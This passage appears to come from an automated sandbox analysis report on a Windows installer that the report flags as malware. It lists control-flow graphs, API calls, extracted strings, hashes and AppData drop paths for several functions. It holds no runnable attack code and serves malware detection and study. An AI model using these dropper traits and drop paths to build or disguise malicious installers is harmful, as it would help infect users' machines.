                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                                                            • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                                                            • DialogBoxParamW.USER32(?,00000000,00403D08,00000000), ref: 00403BE3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                            • API String ID: 1975747703-2722336503
                                                                            • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                                            • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                                                            • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                                            • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D
                                                                            Function 00402EC1 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 182COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d3e 372 402f11-402f16 369->372 373 402f1b-402f49 call 40624c call 405b69 call 40624c GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 4032df 384->387 386->387 394 4030a0-4030a8 call 402e5d 387->394 395 402f7e-402f85 387->395 392 40304b-403063 call 4032f5 call 4032df 388->392 393 40306d-403097 GlobalAlloc call 4032f5 call 4030fa 388->393 389->374 392->389 416 403065-40306b 392->416 393->389 420 4030aa-4030bb 393->420 394->389 398 403001-403005 395->398 399 402f87-402f9b call 405cf9 395->399 406 403007-40300e call 402e5d 398->406 407 40300f-403015 398->407 399->407 418 402f9d-402fa4 399->418 406->407 411 403024-40302e 407->411 412 403017-403021 call 406719 407->412 411->384 419 403034 411->419 412->411 416->389 416->393 418->407 422 402fa6-402fad 418->422 419->381 423 4030c3-4030c8 420->423 424 4030bd 420->424 422->407 425 402faf-402fb6 422->425 426 4030c9-4030cf 423->426 424->423 425->407 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405cf9 426->428 427->407 430 402fc1-402fe1 427->430 431 4030f1 428->431 430->389 432 402fe7-402feb 430->432 431->374 433 402ff3-402ffb 432->433 434 402fed-402ff1 432->434 433->407 435 402ffd-402fff 433->435 434->419 434->433 435->407
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00402ED2
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                              • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                              • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe", xrefs: 00402EC1
                                                                            • C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
                                                                            • Inst, xrefs: 00402FA6
                                                                            • Null, xrefs: 00402FB8
                                                                            • Error launching installer, xrefs: 00402F11
                                                                            • soft, xrefs: 00402FAF
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 4283519449-1029440096
                                                                            • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                            • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                                                            • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                            • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD
                                                                            Function 0040626E Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 436 40626e-406279 437 40627b-40628a 436->437 438 40628c-4062a2 436->438 437->438 439 4062a8-4062b5 438->439 440 4064ba-4064c0 438->440 439->440 441 4062bb-4062c2 439->441 442 4064c6-4064d1 440->442 443 4062c7-4062d4 440->443 441->440 445 4064d3-4064d7 call 40624c 442->445 446 4064dc-4064dd 442->446 443->442 444 4062da-4062e6 443->444 447 4064a7 444->447 448 4062ec-40632a 444->448 445->446 452 4064b5-4064b8 447->452 453 4064a9-4064b3 447->453 450 406330-40633b 448->450 451 40644a-40644e 448->451 454 406354 450->454 455 40633d-406342 450->455 456 406450-406456 451->456 457 406481-406485 451->457 452->440 453->440 463 40635b-406362 454->463 455->454 460 406344-406347 455->460 461 406466-406472 call 40624c 456->461 462 406458-406464 call 406193 456->462 458 406494-4064a5 lstrlenW 457->458 459 406487-40648f call 40626e 457->459 458->440 459->458 460->454 465 406349-40634c 460->465 470 406477-40647d 461->470 462->470 467 406364-406366 463->467 468 406367-406369 463->468 465->454 471 40634e-406352 465->471 467->468 473 4063a4-4063a7 468->473 474 40636b-406389 call 40611a 468->474 470->458 476 40647f 470->476 471->463 477 4063b7-4063ba 473->477 478 4063a9-4063b5 GetSystemDirectoryW 473->478 479 40638e-406392 474->479 480 406442-406448 call 4064e0 476->480 482 406425-406427 477->482 483 4063bc-4063ca GetWindowsDirectoryW 477->483 481 406429-40642d 478->481 484 406432-406435 479->484 485 406398-40639f call 40626e 479->485 480->458 481->480 487 40642f 481->487 482->481 486 4063cc-4063d6 482->486 483->482 484->480 490 406437-40643d lstrcatW 484->490 485->481 492 4063f0-406406 SHGetSpecialFolderLocation 486->492 493 4063d8-4063db 486->493 487->484 490->480 496 406421 492->496 497 406408-40641f SHGetPathFromIDListW CoTaskMemFree 492->497 493->492 495 4063dd-4063e4 493->495 498 4063ec-4063ee 495->498 496->482 497->481 497->496 498->481 498->492
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063AF
                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,fusionsenergiens,?,004052E7,fusionsenergiens,00000000), ref: 004063C2
                                                                            • SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000,fusionsenergiens,?,004052E7,fusionsenergiens,00000000), ref: 004063FE
                                                                            • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 0040640C
                                                                            • CoTaskMemFree.OLE32(00410EA0), ref: 00406417
                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                                                            • lstrlenW.KERNEL32(: Completed,00000000,fusionsenergiens,?,004052E7,fusionsenergiens,00000000), ref: 00406495
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                            • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$fusionsenergiens
                                                                            • API String ID: 717251189-3063109906
                                                                            • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                                            • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                                                            • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                                            • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E
                                                                            Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 563 40176f-401794 call 402c37 call 405b94 568 401796-40179c call 40624c 563->568 569 40179e-4017b0 call 40624c call 405b1d lstrcatW 563->569 574 4017b5-4017b6 call 4064e0 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 40658f 578->579 580 4017f2-4017f5 578->580 587 4017dd-4017ef 579->587 588 4017cd-4017db CompareFileTime 579->588 581 4017f7-4017f8 call 405d19 580->581 582 4017fd-401819 call 405d3e 580->582 581->582 590 40181b-40181e 582->590 591 40188d-4018b6 call 4052b0 call 4030fa 582->591 587->580 588->587 592 401820-40185e call 40624c * 2 call 40626e call 40624c call 4058ae 590->592 593 40186f-401879 call 4052b0 590->593 603 4018b8-4018bc 591->603 604 4018be-4018ca SetFileTime 591->604 592->578 625 401864-401865 592->625 605 401882-401888 593->605 603->604 607 4018d0-4018db CloseHandle 603->607 604->607 608 402ac8 605->608 611 4018e1-4018e4 607->611 612 402abf-402ac2 607->612 613 402aca-402ace 608->613 615 4018e6-4018f7 call 40626e lstrcatW 611->615 616 4018f9-4018fc call 40626e 611->616 612->608 622 401901-4022f6 call 4058ae 615->622 616->622 622->612 622->613 625->605 627 401867-401868 625->627 627->593
                                                                            APIs
                                                                            • lstrcatW.KERNEL32(00000000,00000000,DllUnregisterServer,C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer,?,?,00000031), ref: 004017B0
                                                                            • CompareFileTime.KERNEL32(-00000014,?,DllUnregisterServer,DllUnregisterServer,00000000,00000000,DllUnregisterServer,C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer,?,?,00000031), ref: 004017D5
                                                                              • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                              • Part of subcall function 004052B0: lstrcatW.KERNEL32(fusionsenergiens,00403233,00403233,fusionsenergiens,00000000,00410EA0,00403094), ref: 0040530B
                                                                              • Part of subcall function 004052B0: SetWindowTextW.USER32(fusionsenergiens,fusionsenergiens), ref: 0040531D
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer$C:\Users\user\AppData\Roaming\kontorarbejders\restbelbenes.dll$C:\Users\user\investeringsbelbenes\redocking.gal$DllUnregisterServer
                                                                            • API String ID: 1941528284-1709933325
                                                                            • Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                                            • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                                                            • Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                                            • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
                                                                            Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 629 4052b0-4052c5 630 4052cb-4052dc 629->630 631 40537c-405380 629->631 632 4052e7-4052f3 lstrlenW 630->632 633 4052de-4052e2 call 40626e 630->633 635 405310-405314 632->635 636 4052f5-405305 lstrlenW 632->636 633->632 638 405323-405327 635->638 639 405316-40531d SetWindowTextW 635->639 636->631 637 405307-40530b lstrcatW 636->637 637->635 640 405329-40536b SendMessageW * 3 638->640 641 40536d-40536f 638->641 639->638 640->641 641->631 642 405371-405374 641->642 642->631
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                            • lstrlenW.KERNEL32(00403233,fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                            • lstrcatW.KERNEL32(fusionsenergiens,00403233,00403233,fusionsenergiens,00000000,00410EA0,00403094), ref: 0040530B
                                                                            • SetWindowTextW.USER32(fusionsenergiens,fusionsenergiens), ref: 0040531D
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID: fusionsenergiens
                                                                            • API String ID: 2531174081-3026270399
                                                                            • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                                            • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                                                            • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                                            • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68
                                                                            Function 004030FA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 643 4030fa-403111 644 403113 643->644 645 40311a-403122 643->645 644->645 646 403124 645->646 647 403129-40312e 645->647 646->647 648 403130-403139 call 4032f5 647->648 649 40313e-40314b call 4032df 647->649 648->649 653 403151-403155 649->653 654 403296 649->654 655 40315b-40317b GetTickCount call 406787 653->655 656 40327f-403281 653->656 657 403298-403299 654->657 667 4032d5 655->667 669 403181-403189 655->669 658 403283-403286 656->658 659 4032ca-4032ce 656->659 661 4032d8-4032dc 657->661 662 403288 658->662 663 40328b-403294 call 4032df 658->663 664 4032d0 659->664 665 40329b-4032a1 659->665 662->663 663->654 677 4032d2 663->677 664->667 670 4032a3 665->670 671 4032a6-4032b4 call 4032df 665->671 667->661 674 40318b 669->674 675 40318e-40319c call 4032df 669->675 670->671 671->654 679 4032b6-4032c2 call 405df0 671->679 674->675 675->654 682 4031a2-4031ab 675->682 677->667 686 4032c4-4032c7 679->686 687 40327b-40327d 679->687 684 4031b1-4031ce call 4067a7 682->684 689 4031d4-4031eb GetTickCount 684->689 690 403277-403279 684->690 686->659 687->657 691 403236-403238 689->691 692 4031ed-4031f5 689->692 690->657 695 40323a-40323e 691->695 696 40326b-40326f 691->696 693 4031f7-4031fb 692->693 694 4031fd-40322e MulDiv wsprintfW call 4052b0 692->694 693->691 693->694 701 403233 694->701 699 403240-403245 call 405df0 695->699 700 403253-403259 695->700 696->669 697 403275 696->697 697->667 705 40324a-40324c 699->705 703 40325f-403263 700->703 701->691 703->684 704 403269 703->704 704->667 705->687 706 40324e-403251 705->706 706->703
                                                                            APIs
                                                                            Strings
                                                                            • svndrukne bersaglieri fortaelleren resocialiserende.suzannahs prefixally extraordinarily terebellidae reduviids alphabetizer skraldgrinet,nondeadly nebulousness alpinesque arveonkels retailors trichocephaliasis.weepable rekonstrueredes kamtakket slutnumrets kl, xrefs: 00403124
                                                                            • ... %d%%, xrefs: 00403216
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: ... %d%%$svndrukne bersaglieri fortaelleren resocialiserende.suzannahs prefixally extraordinarily terebellidae reduviids alphabetizer skraldgrinet,nondeadly nebulousness alpinesque arveonkels retailors trichocephaliasis.weepable rekonstrueredes kamtakket slutnumrets kl
                                                                            • API String ID: 551687249-3626677696
                                                                            • Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                                            • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                                                            • Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                                            • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9
                                                                            Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 707 4065b6-4065d6 GetSystemDirectoryW 708 4065d8 707->708 709 4065da-4065dc 707->709 708->709 710 4065ed-4065ef 709->710 711 4065de-4065e7 709->711 713 4065f0-406623 wsprintfW LoadLibraryExW 710->713 711->710 712 4065e9-4065eb 711->712 712->713
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                                                            • wsprintfW.USER32 ref: 00406608
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                            • API String ID: 2200240437-1946221925
                                                                            • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                            • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                                                            • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                            • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8
                                                                            Function 00405D6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
